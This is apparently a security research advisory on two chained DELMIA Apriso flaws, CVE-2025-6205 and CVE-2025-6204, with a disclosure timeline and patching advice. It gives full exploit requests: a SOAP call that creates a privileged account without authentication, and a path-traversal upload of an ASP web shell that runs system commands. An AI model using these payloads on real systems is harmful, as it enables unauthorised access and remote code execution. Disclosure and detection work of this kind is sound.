Table of Contents
Introduction
DELMIA Apriso is a manufacturing execution and operations orchestration platform used by large manufacturers, service providers, and critical infrastructure operators. Because the product exposes multiple integration points (SOAP, file uploads, provisioning feeds) that are often reachable from internal networks, we performed a focused black-box assessment to surface integration and surface-area weaknesses.
Our testing uncovered two chained, high-impact issues: an unauthenticated SOAP provisioning endpoint that can create accounts with elevated roles, and an upload handler that fails to canonicalize filenames, allowing authenticated users to drop executable files into a web-served directory. Together these lead to full application compromise and were assigned CVE-2025-6204 and CVE-2025-6205.
During the same engagement we also discovered unauthenticated deserialization flaws in other components. We reported those deserialization issues to Apple’s bug bounty program at the time (we did not submit them directly to the vendor), and later independent research by Synacktiv documented the very same vulnerabilities across Apriso versions corroborating that these classes of flaws recurred in the product family.
Background and scope
We tested an on-prem installation of DELMIA Apriso’s application stack. The product exposes a SOAP-based message processor endpoint that accepts XML payloads for bulk employee/identity provisioning. Separately, the product exposes a file upload API used by portal components but that is accessible only post-authentication. Under normal operation these features are intended to be restricted to trusted integrations and administrators. During testing we discovered that:
- CVE-2025-6205: The SOAP message processor can be driven by unauthenticated requests to create arbitrary employee accounts and assign them a privileged role (“Production User”).
- CVE-2025-6204: The portal file upload mechanism fails to properly sanitize and normalize filenames, allowing path traversal sequences in the filename parameter. Authenticated attackers can therefore write executable files into the server’s web root.
Both findings chain together: the unauthenticated account creation gives an attacker credentials, and those credentials are then used to authenticate and abuse the file upload to drop a web shell.
CVE-2025-6205: Unauthenticated arbitrary user creation
A SOAP action implemented at /Apriso/MessageProcessor/FlexNetMessageProcessor.svc accepts a ProcessMessageASync_v2 operation carrying an XML document that conforms to a FlexNet_Employees schema. The XML structure includes fields for login name, password, employee metadata and, crucially, employee roles. We sent a crafted XML payload (embedded in the SOAP body) that included a new employee element with a login and password of our choosing and assigned the Production User role.
The endpoint processed the payload without requiring any authentication or message-signing, and created the account in the system. The ability to create an account with a role that grants elevated privileges turns an external attacker into an authenticated, powerful principal with the ability to perform actions intended only for administrators or trusted integrations.
Vulnerable HTTP Request:
http
1POST /Apriso/MessageProcessor/FlexNetMessageProcessor.svc HTTP/1.1
2Content-type: text/xml;charset=utf-8
3Host: {{Hostname}}
4Soapaction: "http://tempuri.org/IFlexNetMessageProcessor/ProcessMessageASync_v2"
5
6<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
7xmlns:tem="http://tempuri.org/">
8 <soapenv:Header/>
9 <soapenv:Body>
10 <tem:ProcessMessageASync_v2>
11 <tem:xmlMessage><FlexNet_Employees xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="S:/SchemaRepository/XMLSchemas/FlexNet/FlexNet_Employees.xsd" Version="1.0"> 	<Employee> 		<GivenName>FIRST</GivenName> 		<FamilyName>LAST</FamilyName> 		<EmployeeNo>08262004</EmployeeNo> 		<LoginName>LAST</LoginName> 		<Password>9</Password> 		<HireDate>2000-06-01T00:00:00</HireDate> 		<SpokenLanguageID>1033</SpokenLanguageID> 		<WrittenLanguageID>1033</WrittenLanguageID> 		<EmployeeValidDate>2000-06-01T00:00:00</EmployeeValidDate> 		<LoginExpirationDate>9999-12-31T00:00:00</LoginExpirationDate> 		<EmployeeType>0</EmployeeType> 		<DefaultFacility>C1P1</DefaultFacility> 		<TrackLaborFlag>true</TrackLaborFlag> 		<ResourceID NodeType="Field"> 			<Resource_Insert> 				<Name>FIRST</Name> 				<ResourceName>FIRST</ResourceName> 				<ResourceType>1</ResourceType> 				<FUID NodeType="Field"/> 			</Resource_Insert> 		</ResourceID> 		<EmployeeRole> 			<EmployeeID NodeType="Field"/> 			<RoleID NodeType="Field"> 				<Role> 					<Role>Production User</Role> 				</Role> 			</RoleID> 		</EmployeeRole> 	</Employee> </FlexNet_Employees></tem:xmlMessage>
12 <tem:applicationName>myExternalApplication</tem:applicationName>
13 </tem:ProcessMessageASync_v2>
14 </soapenv:Body>
15</soapenv:Envelope>The HTML encoded XML payload is nothing but the following XML content:
xml
1<FlexNet_Employees xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
2 xsi:noNamespaceSchemaLocation="S:/SchemaRepository/XMLSchemas/FlexNet/FlexNet_Employees.xsd"
3 Version="1.0">
4 <Employee>
5 <GivenName>FIRST</GivenName>
6 <FamilyName>LAST</FamilyName>
7 <EmployeeNo>08262004</EmployeeNo>
8 <LoginName>LAST</LoginName>
9 <Password>9</Password>
10 <HireDate>2000-06-01T00:00:00</HireDate>
11 <SpokenLanguageID>1033</SpokenLanguageID>
12 <WrittenLanguageID>1033</WrittenLanguageID>
13 <EmployeeValidDate>2000-06-01T00:00:00</EmployeeValidDate>
14 <LoginExpirationDate>9999-12-31T00:00:00</LoginExpirationDate>
15 <EmployeeType>0</EmployeeType>
16 <DefaultFacility>C1P1</DefaultFacility>
17 <TrackLaborFlag>true</TrackLaborFlag>
18 <ResourceID NodeType="Field">
19 <Resource_Insert>
20 <Name>FIRST</Name>
21 <ResourceName>FIRST</ResourceName>
22 <ResourceType>1</ResourceType>
23 <FUID NodeType="Field" />
24 </Resource_Insert>
25 </ResourceID>
26 <EmployeeRole>
27 <EmployeeID NodeType="Field" />
28 <RoleID NodeType="Field">
29 <Role>
30 <Role>Production User</Role>
31 </Role>
32 </RoleID>
33 </EmployeeRole>
34 </Employee>
35</FlexNet_Employees>An attacker can send the above crafted SOAP request to create a new user with arbitrary credentials (e.g., username: LAST, password: 9 in this case) without authentication. The XML payload allows setting user details and assigning the "Production User" role, which may grant elevated privileges.
Nuclei Template to Scan CVE-2025-6205
CVE-2025-6204: Remote Code Execution via Authenticated File Upload
After authenticating with an account created via the SOAP endpoint, we exercised the application’s file upload API. The upload handler accepts a filename parameter but does not correctly normalize it. By including path traversal sequences in the filename we were able to have the server persist the uploaded data into a directory that is subsequently served by the webserver, thereby allowing execution of server-side code uploaded by the attacker.
Send a crafted request to upload a web shell with authenticated cookies using the first bug:
http
1POST /Apriso/webservices/1.1/operation.svc/UploadFile?filename=375c9638-1a4e-465d-90d7-f69321315acb-xxx\..\..\..\portal\uploads\webshell.asp HTTP/1.1
2Host: {{Hostname}}
3Cookie: [Redacted... Authenticate session ...Redacted]
4Content-Type: application/x-www-form-urlencoded
5
6<%
7 Response.Write "{{randstr}}" & "<br>"
8
9 Set rs = CreateObject("WScript.Shell")
10 Set cmd = rs.Exec("cmd /c whoami")
11 o = cmd.StdOut.Readall()
12 Response.write(o)
13
14 Set fso = Server.CreateObject("Scripting.FileSystemObject")
15 fso.DeleteFile Server.MapPath(Request.ServerVariables("SCRIPT_NAME")), True
16 Set fso = Nothing
17%>Access the web shell at /apriso/portal/uploads/webshell.asp in the same authenticated session, to make it safe for testing, uploaded webshell gets auto delete upon access.
Nuclei Template to Scan CVE-2025-6204
Conclusion
In conclusion, our black-box assessment of DELMIA Apriso revealed a chain of critical issues - an unauthenticated provisioning endpoint that allows account creation with elevated roles and an authenticated file-upload path-traversal that leads to remote code execution. Together these flaws create a low-effort, high-impact path to full application compromise and lateral movement, placing organizations that rely on Apriso at substantial risk if left unmitigated.
We strongly encourage DELMIA Apriso operators to immediately apply vendor patches. We also recommend checking newly created privileged accounts and scanning upload directories for unexpected web shells or similar executables.
To help defenders quickly identify affected systems, we published two Nuclei templates for these issues to the ProjectDiscovery Cloud platform; you can use it to scan your infrastructure for susceptible Apriso instances. ProjectDiscovery also offers free monthly scans to help organizations detect emerging threats and a 30-day trial for business email addresses to run broader coverage - useful complements while you roll out fixes and compensating controls.
Disclosure timeline
| Date | Event |
|---|---|
| 2025-05-14 | Issues reported to 3DS Security. |
| 2025-05-14 | Acknowledgement received from vendor. |
| 2025-05-15 | Vendor requested additional configuration and version details. |
| 2025-05-16 | Additional details provided to the vendor |
| 2025-08-06 | Two CVEs assigned and published (CVE-2025-6204, CVE-2025-6205). |
By embracing Nuclei and participating in the open-source community or joining the ProjectDiscovery Cloud Platform, organizations can strengthen their security defenses, stay ahead of emerging threats, and create a safer digital environment. Security is a collective effort, and together we can continuously evolve and tackle the challenges posed by cyber threats.